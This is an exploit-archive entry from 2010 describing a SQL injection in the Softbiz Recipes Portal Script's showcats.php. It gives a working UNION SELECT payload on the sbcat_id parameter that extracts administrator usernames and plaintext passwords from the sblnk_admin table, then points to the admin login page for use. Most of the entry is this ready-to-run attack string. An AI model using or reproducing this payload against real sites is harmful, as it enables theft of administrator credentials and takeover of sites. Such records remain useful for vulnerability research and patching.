Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability

2010-02-25T00:00:00
ID 1337DAY-ID-11082
Type zdt
Reporter Easy Laster
Modified 2010-02-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================================
Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability
========================================================================

----------------------------Information------------------------------------------------
+Name : Softbiz Recipes Portal Script SQL Injection showcats.php
+Autor : Easy Laster
+Date   : 25.02.2010
+Script  : Softbiz Recipes Portal Script
+Price : 99$
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/showcats.php?sbcat_id=
+Exploitable   : http://server/showcats.php?sbcat_id=1+union+select+1,
concat(username,0x3a,password),3,4+from+sblnk_admin
 
 
The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------



#  0day.today [2018-01-03]  #